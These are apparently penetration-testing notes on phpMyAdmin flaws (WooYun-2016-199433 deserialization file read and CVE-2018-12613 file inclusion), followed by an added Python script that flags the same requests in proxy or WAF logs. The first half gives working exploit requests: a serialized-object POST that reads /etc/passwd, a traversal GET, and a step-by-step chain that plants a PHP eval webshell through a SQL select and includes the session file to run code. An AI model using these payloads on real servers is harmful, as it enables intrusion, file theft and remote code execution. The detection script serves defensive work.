phpMyAdmin
1. Vulnerability Reproduction
WooYun-2016-199433: arbitrary file read via deserialization
Affected versions: phpMyAdmin 2.x
Arbitrary file read via a POST request:
POST /scripts/setup.php HTTP/1.1
Host: 192.168.135.131:8080
Connection: close
Content-Length: 80
Content-Type: application/x-www-form-urlencoded

configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}&action=test
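CVE-2018-12613: file inclusion vulnerability
Affected versions: phpMyAdmin 4.8.0, 4.8.1
File inclusion via a GET request: /index.php?target=sql.php?../../../../../etc/passwd
Session file inclusion (log poisoning can also be tried):
Execute an SQL statement so that a PHP one-liner is saved into a temporary file ($_POST may not work)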
select "<?php @eval($_GET[1]);?>"
Press F12 and read the value of the phpMyAdmin cookie (841d39f9673beed785423110f508d7f1)
The temporary file is named sess_ followed by the phpMyAdmin cookie value (sess_841d39f9673beed785423110f508d7f1)
GetShell via file inclusion: /index.php?target=sql.php?../../../../../tmp/sess_841d39f9673beed785423110f508d7f1&1=phpinfo();
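
The Python example below is added here and is not part of the original notes: it flags the requests shown above when given a method, URL and body taken from a proxy or WAF log. The names classify and fully_decode, the finding strings and the benign sample request are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Header of a PHP serialized object, e.g. O:10:"PMA_Config":1:{
SERIALIZED_OBJ = re.compile(r'O:\d+:"[A-Za-z_][A-Za-z0-9_\\]*":\d+:\{')
TRAVERSAL = re.compile(r'\.\.[/\\]')
SESSION_FILE = re.compile(r'sess_[0-9A-Za-z,-]{16,}')

def fully_decode(value, rounds=3):
    """Undo nested URL encoding (%253f -> %3f -> ?) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(method, url, body=""):
    """Return findings for one request. Hypothetical helper, not a phpMyAdmin API."""
    findings = []
    parts = urlsplit(url)
    if method == "POST" and parts.path.lower().endswith("/scripts/setup.php"):
        # The file read rides on a serialized object in the 'configuration' field.
        for value in parse_qs(body).get("configuration", []):
            if SERIALIZED_OBJ.search(fully_decode(value)):
                findings.append("setup.php: serialized object in 'configuration'")
    for value in parse_qs(parts.query).get("target", []):
        target = fully_decode(value)
        _, sep, rest = target.partition("?")
        # Directory traversal in the part of 'target' that follows a '?'.
        if sep and TRAVERSAL.search(rest):
            findings.append("target: traversal after '?'")
        if SESSION_FILE.search(target):
            findings.append("target: session file referenced")
    return findings

# Requests taken from this page, plus one constructed benign request.
SAMPLES = [
    ("POST", "/scripts/setup.php",
     'configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}&action=test'),
    ("GET", "/index.php?target=sql.php?../../../../../etc/passwd", ""),
    ("GET", "/index.php?target=sql.php?../../../../../tmp/"
            "sess_841d39f9673beed785423110f508d7f1&1=phpinfo();", ""),
    ("GET", "/index.php?target=sql.php&db=test", ""),  # constructed, benign
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, url, "->", classify(method, url, body) or "clean")
```

The POST body is not recorded in a standard access log, so the setup.php check needs a source that captures request bodies.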